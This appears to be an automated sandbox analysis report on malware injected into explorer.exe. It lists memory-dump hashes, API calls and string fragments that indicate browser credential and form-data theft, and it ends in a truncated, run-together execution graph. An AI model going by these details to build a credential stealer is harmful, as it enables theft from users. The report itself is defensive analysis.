                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: socket
                            • String ID: sock
                            • API String ID: 98920635-2415254727
                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                            • Instruction ID: 0ed133b779e51096235aeded9c0a239a34a9c1cbac4bd6a0ed12bd33d73c7f9f
                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                            • Instruction Fuzzy Hash: 180121706186188FCB84EF5CD048B54BBE0FB59354F1545ADD45ECB366C7B0D9818B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 427 479d2dd-479d320 call 47a8942 430 479d3fa-479d40e 427->430 431 479d326 427->431 432 479d328-479d339 SleepEx 431->432 432->432 433 479d33b-479d341 432->433 434 479d34b-479d352 433->434 435 479d343-479d349 433->435 437 479d370-479d376 434->437 438 479d354-479d35a 434->438 435->434 436 479d35c-479d36a call 47a7f12 435->436 436->437 440 479d378-479d37e 437->440 441 479d3b7-479d3bd 437->441 438->436 438->437 440->441 443 479d380-479d38a 440->443 444 479d3bf-479d3cf call 479de72 441->444 445 479d3d4-479d3db 441->445 443->441 448 479d38c-479d3b1 call 479e432 443->448 444->445 445->432 447 479d3e1-479d3f5 call 479d0f2 445->447 447->432 448->441
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                            • Instruction ID: a308836842c9a3b0e17c6dea78149f9b87b882bd8fc4efe1171c21b3e0071979
                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                            • Instruction Fuzzy Hash: 62316DB4614B09DFDF64EF2990882E5B7E0FB54305F44467EC91DCA206C738A850CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                            • Instruction ID: baa4f0636d40d1991f2cff3920f367aae9f249b3f4ac6143522a4aa1cf0158cb
                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                            • Instruction Fuzzy Hash: B9F0F630268B484FEB88EF6CD44563AF3D0FBE8214F45063EA94DC3364DA39D5818756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                            • API String ID: 0-393284711
                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                            • Instruction ID: 8b14ae214ddaa82c5449254ebd1440f83e5ac0fdad6cfc9778875380a436ea15
                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                            • Instruction Fuzzy Hash: 89E14574618B488FCB65EF68C4847EBB7E0FB58304F505A2E969BC7255DF30E5018B8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                            • API String ID: 0-2916316912
                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                            • Instruction ID: f6fd2f111036879026bfcc26d9b2508348c19eaf364ee74b3e1d4dfbca37a15e
                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                            • Instruction Fuzzy Hash: E9B19C30618B488EDB65EF68C489AEEB7F1FF98300F50551ED59ACB251EF70E4058B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                            • API String ID: 0-1539916866
                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                            • Instruction ID: 82f3fe1e0dff0aa0e150904d704427932f9f6d9ca38977584c102fcb770cac53
                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                            • Instruction Fuzzy Hash: 08419A70A18B0C8FDB149F9CA4456BE7BE2EB88704F00425EE809E7245DFB5ED458BD6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                            • API String ID: 0-355182820
                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                            • Instruction ID: fe0ce3c93ed1c4b20ab18b1a8daaed51f0ca8e50774f99f0ed0f26ef3802e336
                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                            • Instruction Fuzzy Hash: 24C15770218B499BC758EF28C885AEAF3E1FB98314F41572E959EC7250DF30F6158B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                            • API String ID: 0-97273177
                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                            • Instruction ID: 2f203c3944fb58b327013544186beb47088df5f5fde780c4f50d96c7b453e733
                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                            • Instruction Fuzzy Hash: 4C51C13051C7488FD719DF18D8852EBB7E5FB85714F502A2EE9CB87242DBB4E5068B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                            • API String ID: 0-639201278
                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                            • Instruction ID: c9177b00488c7097370192e649f05fc07458ff3bd5604fdd8453874e6bab310a
                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                            • Instruction Fuzzy Hash: 64C1A070618A1A4FC758EF28D895AEAB3E0FB98314F81532D854EDB255DF30F901CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                            • API String ID: 0-639201278
                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                            • Instruction ID: 34a87c113d7ee73d64cbd1de785dfa186ed528028e6bc788818baf86a8e7e3b4
                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                            • Instruction Fuzzy Hash: A9C1A070618A1A4FC758EF28D895AEAB3E1FB98314F81532D854EDB255DF30F901CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: UR$2$L: $Pass$User$name$word
                            • API String ID: 0-2058692283
                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                            • Instruction ID: da122b8d6122445a74f0eae787ec5f6e5242567960bb3014c89c53fae6e55350
                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                            • Instruction Fuzzy Hash: 80A1BF706187488FDB29EFA8D4447EEB7E1FF88314F00562DE58ADB291EF30A5458789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: UR$2$L: $Pass$User$name$word
                            • API String ID: 0-2058692283
                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                            • Instruction ID: 991bf34b05f575879fb04cdf681c3ef7b63c296116614313c5cb0e2cf6cf7064
                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                            • Instruction Fuzzy Hash: 9591BE306187488FDB28EFA8D444BEEB7E1FF88314F00562EE58ADB251EF7095458789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $.$e$n$v
                            • API String ID: 0-1849617553
                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                            • Instruction ID: 8df45b4fc9ea1481625137d837e9e203ebff090433190b65004fa7bd9a497b65
                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                            • Instruction Fuzzy Hash: A77182316187498FD758EFA8D4886EAB7F1FF58304F00162EE44ADB261EF71E9458B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2.dl$dll$l32.$ole3$shel
                            • API String ID: 0-1970020201
                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                            • Instruction ID: f19e0e71e26402624988354857b830e12488e64a5701fa6512269ff0a44692de
                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                            • Instruction Fuzzy Hash: 14514CB0918B4D8FDB64EFA4C044AEEB7F1FF58300F41562E959AE7254EF30A5418B89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4$\$dll$ion.$vers
                            • API String ID: 0-1610437797
                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                            • Instruction ID: c3c57cd72a2da5119088b83265c86406ea90737fde6a0fd149b63b3f9bed2662
                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                            • Instruction Fuzzy Hash: 60416F30218B898BCB75EF2898457EBB3E4FB98315F41562E994ECB240EF30E505C782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 32.d$cli.$dll$sspi$user
                            • API String ID: 0-327345718
                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                            • Instruction ID: 6d9695c06749f99525b1db45955c8602ad58cdc6364bdb46b63ad525725da7de
                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                            • Instruction Fuzzy Hash: DC416F34A18E0D8FCB58EF5880957AE77E1FF68304F51516AA80AEB210DE70E5408BC6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$el32$h$kern
                            • API String ID: 0-4264704552
                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                            • Instruction ID: e77d230728a59fc53a6f231abff5da43e924165f5be3b01337f59847fb91c93f
                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                            • Instruction Fuzzy Hash: 6A418C70608B498FD769DF2CC0883BAB7E1FB98305F105A3E959AC6255DF70D845CB86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $Snif$f fr$om:
                            • API String ID: 0-3434893486
                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                            • Instruction ID: f05c54302533e9c8ccd62f3f5223051f13a01bd63e4bdb1060373d7dd49cd2bd
                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                            • Instruction Fuzzy Hash: 7B31BE7150DB886FD72AEB68C4846EBB7D4FB84310F50591EE49BC7252EE30E54ACB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $Snif$f fr$om:
                            • API String ID: 0-3434893486
                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                            • Instruction ID: 178593e00ed626d045ac2bf0febcd5be61d033e78888b6e13689e117029deeb8
                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                            • Instruction Fuzzy Hash: 4631CE7150CB486FD72AEB28C484AEBB7D5FB94310F50591EE49BD7251EE30F50ACA42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$chro$hild$me_c
                            • API String ID: 0-3136806129
                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                            • Instruction ID: d5e6577f07459109d9fda22edf412f0fce57a4668ef875e67e873b8018e5a346
                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                            • Instruction Fuzzy Hash: A6319C30118B584FCB84EF288494BABB7E1FF98210F85662D954ECB215DF30E505CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$chro$hild$me_c
                            • API String ID: 0-3136806129
                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                            • Instruction ID: 2e2201a2b0f040313b348f82b7a17d303818fd385d01cd61ffb1ae36f494e707
                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                            • Instruction Fuzzy Hash: 98317A30218B598FCB94EF288894BABB7E1FF98210F95662D954ECB255DF30E5058B42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 0-319646191
                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction ID: 86146144e268b44d87ab3fca824283b7e68c3c0db6c0fddac839d2c99a06bbe9
                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction Fuzzy Hash: 1731CE31614A4D8BCF15EFA8C8847EEB7E1FF58214F41122AE54EEB240DE7896458789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 0-319646191
                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction ID: a4e570bc2c2109a864ef3cf9f3da6b10e54dd9469ba9fcc4c9e148de982a77ab
                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction Fuzzy Hash: 3C21E130614A4D8ACF15EFA8C8847EEBBA1FF58214F41122AE55AEB240DE74D6058789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$l$l$t
                            • API String ID: 0-168566397
                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                            • Instruction ID: 7ce46c2da575459c5bf2ce714e5542196c402977f55fabbe2047687a85292e85
                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                            • Instruction Fuzzy Hash: 7A217A70A28A0E9BDB48EFA8D0447EEBAF0FF18314F50562ED109E7610DB74E5918B84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$l$l$t
                            • API String ID: 0-168566397
                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                            • Instruction ID: 9b2c5ec8af6fcf7670c8078ccac2f17d1e469d0fabef7661d803cab3fb22fa2e
                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                            • Instruction Fuzzy Hash: 74218B70A28A0E9BDB08EFA8D0447EEBBF0FF18314F50562ED109E7600DB74E5518B84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.521630589.000000000DE70000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DE70000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_de70000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: auth$logi$pass$user
                            • API String ID: 0-2393853802
                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                            • Instruction ID: 5de8dd0df05d679268bf6206b3aeedffe2e9e747d6c6ffc512a78a9894f141e4
                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                            • Instruction Fuzzy Hash: 1021AE30618B0D8BCB05DF9998907EEB7E1FF88364F00561DD44AEB244DBB0E9148BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.1%
                            Dynamic/Decrypted Code Coverage:2%
                            Signature Coverage:0%
                            Total number of Nodes:591
                            Total number of Limit Nodes:69
32129 2ddd050 3 API calls 32128->32129 32131 2dd422f 32128->32131 32129->32128 32251 2ddcf80 LdrLoadDll RtlFreeHeap 32131->32251 32132 2dd4324 32252 2ddcf80 LdrLoadDll RtlFreeHeap 32132->32252 32134 2dd432e 32253 2ddcf80 LdrLoadDll RtlFreeHeap 32134->32253 32136 2dd4338 32254 2ddcf80 LdrLoadDll RtlFreeHeap 32136->32254 32138 2dd4342 32255 2ddcf80 LdrLoadDll RtlFreeHeap 32138->32255 32140->31997 32142 2dd5391 32141->32142 32143 2dd4a40 8 API calls 32142->32143 32144 2dd53a7 32143->32144 32145 2dd53f5 32144->32145 32146 2dd53e2 32144->32146 32150 2dd53fa 32144->32150 32147 2ddbdb0 2 API calls 32145->32147 32148 2ddbdb0 2 API calls 32146->32148 32147->32150 32149 2dd53e7 32148->32149 32149->32000 32150->32000 32152 2ddad74 32151->32152 32153 2ddac20 LdrLoadDll 32151->32153 32256 2ddac20 32152->32256 32153->32152 32156 2ddac20 LdrLoadDll 32157 2ddad86 32156->32157 32158 2ddac20 LdrLoadDll 32157->32158 32159 2ddad8f 32158->32159 32160 2ddac20 LdrLoadDll 32159->32160 32161 2ddad98 32160->32161 32162 2ddac20 LdrLoadDll 32161->32162 32163 2ddada1 32162->32163 32164 2ddac20 LdrLoadDll 32163->32164 32165 2ddadad 32164->32165 32166 2ddac20 LdrLoadDll 32165->32166 32167 2ddadb6 32166->32167 32168 2ddac20 LdrLoadDll 32167->32168 32169 2ddadbf 32168->32169 32170 2ddac20 LdrLoadDll 32169->32170 32171 2ddadc8 32170->32171 32172 2ddac20 LdrLoadDll 32171->32172 32173 2ddadd1 32172->32173 32174 2ddac20 LdrLoadDll 32173->32174 32175 2ddadda 32174->32175 32176 2ddac20 LdrLoadDll 32175->32176 32177 2ddade6 32176->32177 32178 2ddac20 LdrLoadDll 32177->32178 32179 2ddadef 32178->32179 32180 2ddac20 LdrLoadDll 32179->32180 32181 2ddadf8 32180->32181 32182 2ddac20 LdrLoadDll 32181->32182 32183 2ddae01 32182->32183 32184 2ddac20 LdrLoadDll 32183->32184 32185 2ddae0a 32184->32185 32186 2ddac20 LdrLoadDll 32185->32186 32187 2ddae13 32186->32187 32188 2ddac20 LdrLoadDll 32187->32188 32189 2ddae1f 32188->32189 32190 2ddac20 LdrLoadDll 32189->32190 32191 2ddae28 32190->32191 32192 2ddac20 
LdrLoadDll 32191->32192 32193 2ddae31 32192->32193 32194 2ddac20 LdrLoadDll 32193->32194 32195 2ddae3a 32194->32195 32196 2ddac20 LdrLoadDll 32195->32196 32197 2ddae43 32196->32197 32198 2ddac20 LdrLoadDll 32197->32198 32199 2ddae4c 32198->32199 32200 2ddac20 LdrLoadDll 32199->32200 32201 2ddae58 32200->32201 32202 2ddac20 LdrLoadDll 32201->32202 32203 2ddae61 32202->32203 32204 2ddac20 LdrLoadDll 32203->32204 32205 2ddae6a 32204->32205 32206 2ddac20 LdrLoadDll 32205->32206 32207 2ddae73 32206->32207 32208 2ddac20 LdrLoadDll 32207->32208 32209 2ddae7c 32208->32209 32210 2ddac20 LdrLoadDll 32209->32210 32211 2ddae85 32210->32211 32212 2ddac20 LdrLoadDll 32211->32212 32213 2ddae91 32212->32213 32214 2ddac20 LdrLoadDll 32213->32214 32215 2ddae9a 32214->32215 32216 2ddac20 LdrLoadDll 32215->32216 32217 2ddaea3 32216->32217 32218 2ddac20 LdrLoadDll 32217->32218 32219 2ddaeac 32218->32219 32220 2ddac20 LdrLoadDll 32219->32220 32221 2ddaeb5 32220->32221 32222 2ddac20 LdrLoadDll 32221->32222 32223 2ddaebe 32222->32223 32224 2ddac20 LdrLoadDll 32223->32224 32225 2ddaeca 32224->32225 32226 2ddac20 LdrLoadDll 32225->32226 32227 2ddaed3 32226->32227 32228 2ddac20 LdrLoadDll 32227->32228 32229 2ddaedc 32228->32229 32229->32005 32231 2ddaf50 LdrLoadDll 32230->32231 32232 2dd9ecc 32231->32232 32262 3809860 LdrInitializeThunk 32232->32262 32233 2dd9ee3 32233->31926 32235->32002 32237 2ddaf50 LdrLoadDll 32236->32237 32238 2dda54c NtAllocateVirtualMemory 32237->32238 32238->32108 32240 2ddcf36 32239->32240 32241 2ddcf30 32239->32241 32242 2ddbf80 2 API calls 32240->32242 32241->32113 32243 2ddcf5c 32242->32243 32243->32113 32245 2ddcfc0 32244->32245 32246 2ddbf80 2 API calls 32245->32246 32247 2ddd01d 32245->32247 32248 2ddcffa 32246->32248 32247->32121 32249 2ddbdb0 2 API calls 32248->32249 32249->32247 32250->32118 32251->32132 32252->32134 32253->32136 32254->32138 32255->32140 32257 2ddac3b 32256->32257 32258 2dd4e40 LdrLoadDll 32257->32258 32259 2ddac5b 32258->32259 32260 
